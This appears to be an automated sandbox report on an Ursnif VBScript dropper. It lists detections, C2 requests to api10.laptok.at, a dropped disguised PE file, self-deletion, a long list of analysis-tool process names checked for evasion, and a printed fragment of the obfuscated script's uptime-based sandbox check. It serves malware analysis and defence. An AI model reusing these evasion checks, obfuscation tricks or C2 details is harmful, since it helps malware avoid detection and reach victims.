Analysis Report az9zLeRbhbs2.vbs

Overview

General Information

Sample Name: az9zLeRbhbs2.vbs
Analysis ID: 285804
MD5: 88d06f971fb46ed7164bbaeec852cbb2
SHA1: d8c80137b3ed1168a3a08f15a7bbdd33e5b38fdb
SHA256: 29b80298cbd5f207bedb6bdf997cefe1d99ea64b391e8b465661c498dd06c49c

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\irritable.docx Avira: detection malicious, Label: TR/AD.UrsnifDropper.wdonj
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\irritable.docx Virustotal: Detection: 15%
Multi AV Scanner detection for submitted file
Source: az9zLeRbhbs2.vbs Virustotal: Detection: 19%
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/oruRKHeLXgiK/8AaWsO3HVAc/C7XeiDu1srWMBx/D8W2W4CJwgiX2GF3alKWJ/7_2BWtg5ArRpwWPi/f_2FVumxuZ7dfwO/Uwed2Jr2vselWFsvw5/owgo4EA_2/F5Rb7ENeAY3Qc4z2QAS7/vFL9NN_2BiwHR5xvrgY/B0MKoGqiVDd95rPsTXZil_/2BA0LTEXiOaUV/HrVh3Y_2/FAX9rUddE_2BzZt1_2FXEBw/Dh8YOQbqUv/r61ngWDK0B2pdOY6M/9Ke7M_2Bpq1X/7Cf5GwNocf_/0A_0Dl7LTr5yD4/8qbWlZLcYkLQKyRZLHCeb/0nshGaqdsRx8ERu2/F0xPrjqVj/whLqpxl9/1nU0a HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/zlMYdDNtbUyEBstF6pv/UDp1VV08DSUhSypZMd82pw/qymMXig2wlRRy/Wajqwpsf/0XsZtnj2_2BoxeYoOMNWoGD/j0f0llsi3h/r7i64SA76D9JyNK1M/oZ457ajTOeu8/55lLE2_2BwJ/0IDEw1rkRLeF2P/M6EoSZU0DvuP7_2BxPVai/gFxePd8goAxyrQE_/2BiWvawFEz4B_2F/WhQ8jQxSLcaeT7gPM_/2Be6VhmxG/wnq22A2ltocMM_2FvKVq/jhfH1Cst0utPgqjiql_/0A_0D2NLLSVdNMg8i2uqB5/WAgAgynjB3xms/rQ2Jsr6MWBSosY_2B3/A HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml1.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x14d0f720,0x01d68bbe</date><accdate>0x14d0f720,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x14d0f720,0x01d68bbe</date><accdate>0x14d0f720,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x14d81e2c,0x01d68bbe</date><accdate>0x14d81e2c,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x14d81e2c,0x01d68bbe</date><accdate>0x14d81e2c,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x14da808c,0x01d68bbe</date><accdate>0x14da808c,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x14da808c,0x01d68bbe</date><accdate>0x14da808c,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Sep 2020 15:12:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {3DA65EA3-F7B1-11EA-90E2-ECF4BB862DED}.dat.17.dr, ~DF09DF7AAFE25E0444.TMP.17.dr String found in binary or memory: http://api10.laptok.at/api1/oruRKHeLXgiK/8AaWsO3HVAc/C7XeiDu1srWMBx/D8W2W4CJwgiX2GF3alKWJ/7_2BWtg5Ar
Source: {5A6F3536-F7B1-11EA-90E2-ECF4BB862DED}.dat.23.dr, ~DFD7BDCF5432365426.TMP.23.dr String found in binary or memory: http://api10.laptok.at/api1/zlMYdDNtbUyEBstF6pv/UDp1VV08DSUhSypZMd82pw/qymMXig2wlRRy/Wajqwpsf/0XsZtn
Source: msapplication.xml.17.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.17.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.17.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.17.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.17.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.17.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.17.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.17.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.523372993.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523263028.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523203509.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523287364.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523237194.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523314152.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523351368.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523410634.0000000005C28000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Java / VBScript file with very long strings (likely obfuscated code)
Source: az9zLeRbhbs2.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winVBS@7/42@2/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{3DA65EA1-F7B1-11EA-90E2-ECF4BB862DED}.dat
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\az9zLeRbhbs2.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: az9zLeRbhbs2.vbs Virustotal: Detection: 19%
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:68 CREDAT:9474 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6236 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:68 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6236 CREDAT:9474 /prefetch:2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync
Source: az9zLeRbhbs2.vbs Static file information: File size 1374433 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\39\58\we\She\dollar\54\fun\17\58\Written\56\Coast.pdb source: irritable.docx.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(638293031)) > 0 And compendia391 = 0) ThenExit FunctionEnd If' whod breakthrough baleful peephole cocoa administer Bern spacetime sweatband Renoir pang keen inhalation windbag domestic whatever, 3959229 associable fervid influent GPO Schloss Urdu offal Faust Joaquin lapelled perilous horrible943 sequestration auric911 plan385 serial993 trial standeth Jon smog ice digitalis996 emplace denote balustrade144 electroencephalograph commonality moonbeam keyword metamorphic loop332. interpretive indirect stork inductor lacrosse set problem480 = GetObject("winmgmts:\\.\root\cimv2")set sqXAi = problem480.InstancesOf("Win32_OperatingSystem")REM follicle674 Conrail chine science188 colorimeter serenade994 demur oxalic stretch, 8568349 soulful, sneeze Aquarius, nick FAA destitute herself excessive Leroy726 toolmake Jacobson neonate hillmen soignee ineducable transferor survivor polyhedral ROTC wrath318 sedan condolence nightfall interceptor historian picojoule screwbean opprobrium705 tease levity syllabic alba Cynthia benchmark variable projectile. 9323556 euphorbia loll althea balm mallard. tau solid eddy Burch tan445 Marjorie Montague crowfoot prompt. allow beware civilian sculpture611 Lucretius. benight849, 8269140 pelvis tenure lectern viscometer marvelous stickleback parry Pullman Baxter for each entomology in sqXAiREM gallium, thermo, Pilate, oratoric stonecrop vertex raucous carry glassine dirty joint290 mucosa poultice contradictory772 Othello eager Newcastle apex asperity aqua Orestes jackdaw carryover. Shelton Allan thrush. Huxley sip688, quip neater624 Madras massif. Xavier tupelo primp, insult catenate lesion satiety roomful Viet63 elfin spheroidal grassy incommutable Elmer Meiji orthonormal kerchief midshipmen omnipresent bedfast implicit495 shrub678 decibel Charlemagne morsel denumerable coltish. 
6639792 point marriage Drexel erudition400 Acapulco ATEmb = entomology.LastBootUpTimecnfkGw = Mid(ATEmb,1,4) & "-" & Mid(ATEmb,5,2) & "-" & Mid(ATEmb,7,2) & " " & Mid(ATEmb,9,2) & ":" & Mid(ATEmb,11,2) & ":" & Mid(ATEmb,13,2)REM anatomist beth wing symbolic Hayes gallstone Quakeress cheeky, 330596 Yarmouth hybrid gent indigene Medea414 Belshazzar narcotic transposable. cessation rhapsody. 1410370 Bausch algebraic jaunty pinnate macabre justiciable. 6889385 buildup, recruit264 condemn prey flannel729 Orinoco murder Kirkland Papua checksumming cutthroat cameraman716 enunciate fluid Ostrander Angela cretinous anthracite sorrel Beverly370 scarp superfluous barn acrylic Keynes, injury Lares vomit493 stopwatch837 equilibrium Donner scrounge true417 Cromwellian baroque part940 psychometry795 manipulate tumble. 555949 brownish briar Moluccas mock this unanimity trichloroethane simmer338 mantis Markov interruptible blackguard terrestrial salmonella archbishop. 7134769 docket hank aphasia Canaveral Keller realtor follicular amende fortunate terpsichorean Marlene kQBBGBec = abs(datediff("s",cnfkGw,now))YUCYVJ = kQBBGBec \ 60melan

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\irritable.docx

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\az9zlerbhbs2.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE@.
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE@
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\irritable.docx
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 68 Thread sleep time: -30000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: wscript.exe, 00000000.00000002.427862956.0000024EC5750000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.427862956.0000024EC5750000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.427862956.0000024EC5750000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.427862956.0000024EC5750000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: irritable.docx.0.dr

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Remote Access Functionality:

Yara detected Ursnif